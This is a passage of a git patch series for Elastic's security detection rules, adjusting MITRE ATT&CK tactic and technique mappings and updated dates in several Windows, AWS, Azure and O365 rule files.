"T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/defense_evasion_injection_from_msoffice.toml b/rules_building_block/defense_evasion_injection_from_msoffice.toml index 20edb1bd2e4..6d1c96172e8 100644 --- a/rules_building_block/defense_evasion_injection_from_msoffice.toml +++ b/rules_building_block/defense_evasion_injection_from_msoffice.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -52,54 +52,43 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_service_path_registry.toml b/rules_building_block/defense_evasion_service_path_registry.toml index 1a9f0d9f598..9eb28e15955 100644 --- a/rules_building_block/defense_evasion_service_path_registry.toml +++ b/rules_building_block/defense_evasion_service_path_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -51,41 +51,48 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.011" -name = "Services Registry Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules_building_block/defense_evasion_services_exe_path.toml b/rules_building_block/defense_evasion_services_exe_path.toml index 872bb66c215..5a13a3271d6 100644 --- a/rules_building_block/defense_evasion_services_exe_path.toml +++ b/rules_building_block/defense_evasion_services_exe_path.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -48,41 +48,48 @@ process where event.type == "start" and process.name : "sc.exe" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.011" -name = "Services Registry Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml index 06b0a02191a..e4a2ed6fd5e 100644 --- a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml +++ b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2024/11/07" [rule] author = ["Elastic"] @@ -84,22 +84,20 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" @@ -110,7 +108,17 @@ id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + From 3f775ca8fa82d4f68232daecd1beec8967dedef5 Mon Sep 17 00:00:00 2001 From: terrancedejesus Date: Wed, 25 Mar 2026 13:39:37 -0400 Subject: [PATCH 16/16] updating azure & o365 dates --- .../discovery_storage_blob_container_access_modification.toml | 2 +- .../azure/impact_resources_resource_group_deletion.toml | 2 +- .../o365/credential_access_identity_user_account_lockouts.toml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml index 574b980395c..ea718167fd4 100644 --- a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml +++ b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] diff --git a/rules/integrations/azure/impact_resources_resource_group_deletion.toml b/rules/integrations/azure/impact_resources_resource_group_deletion.toml index cc81e8e2578..50b60fce964 100644 --- a/rules/integrations/azure/impact_resources_resource_group_deletion.toml +++ b/rules/integrations/azure/impact_resources_resource_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] diff --git a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml index 5f1cc7fac8e..0f2f0e73253 100644 --- a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml +++ b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/10" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"]